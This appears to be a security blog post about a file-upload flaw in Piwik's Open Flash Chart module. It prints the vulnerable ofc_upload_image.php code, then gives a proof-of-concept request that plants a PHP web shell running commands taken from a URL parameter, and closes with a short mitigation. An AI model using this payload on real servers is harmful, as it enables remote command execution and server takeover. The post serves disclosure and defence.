Security Information and Review

Collection of security information and review

Piwik and Open Flash Chart Vulnerability

Author : Admin

In the Piwik with the Open Flash Chart Module has been discovered a vulnerability which can be exploited by malicious people to compromise a vulnerable system. The vulnerability exists in Piwik’s implementation of “open-flash-chart”, a module which resides in the “./libs/open-flash-chart/php-ofc-library” directory.

Piwik is an open source web analytics software with open sources and GPL licensed. It provides interesting reports on our website visitors, our popular pages, the search engines keywords they used, the language they speakā€š and so much more, as well as Google Analytics. It gives us real time reports with detail and all features are built inside plugins, so we can add new feature and remove it very easy.

The vulnerable code forces Piwik to create a directory called “./libs/open-flash-chart/tmp-upload-images” which in turn creates a file which is able to hold PHP code. This issue is caused by input validation errors in the “libs/open-flash-chart/php-ofc-library/ofc_upload_image.php” script when processing the “name” parameter, which could be exploited by remote attackers to create malicious PHP scripts on a vulnerable system and execute arbitrary commands with the privileges of the web server. This code however does not function correctly if global variables are unable to be overwritten.

See more chronological with detail bellow, how this vulnerability in Piwik with the Open Flash Chart implementation by analyze the code of Piwik.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
 
<?php
 
    /* this default path for temporary file when we will upload image file */
    $default_path = '../tmp-upload-images/';
 
    /* Check if $default_path variable is exist */
    if (!file_exists($default_path)) 
        /* If true, make directory with full permission */
        mkdir($default_path, 0777, true);
 
    /* then, create file in the directory above with name of file from form input "name" */
    /* this variable isnot sanitised before use */
    $destination = $default_path . basename( $_GET[ 'name' ] );  
 
    echo 'Saving your image to: '. $destination; 
 
    /* malicious code is right here and an attacker can execute this code */
    $jfh = fopen($destination, 'w') or die("can't open file"); 
    fwrite($jfh, $HTTP_RAW_POST_DATA);               
    fclose($jfh);
 
?>

An attacker can exploit this hole to compromise a vulnerable system, with concept :

 
	./libs/open-flash-chart/php-ofc-library/ofc_upload_image.php?name=shell.php&HTTP_RAW_POST_DATA=<?system($_GET['cmd']);?>

So, how to fix this vulnerability ..? Restrict access to the “/libs/open-flash-chart/php-ofc-library” directory (e.g. via an “.htaccess” file). We also edit source code of Piwik in the Open Flash Chart library, see detail code above. The vulnerable file may be omitted from various implementations of the Open Flash Chart library.

Mohamad Widodo

Mohamad Widodo

Share and Enjoy: These icons link to social bookmarking sites where readers can share and discover new web pages.
  • Digg
  • del.icio.us
  • Netvouz
  • DZone
  • ThisNext
  • MisterWong
  • Wists
  • Technorati
  • YahooMyWeb
  • Slashdot
  • StumbleUpon
Categories: Web Application Security
If you like this posts, please leave messages / comments.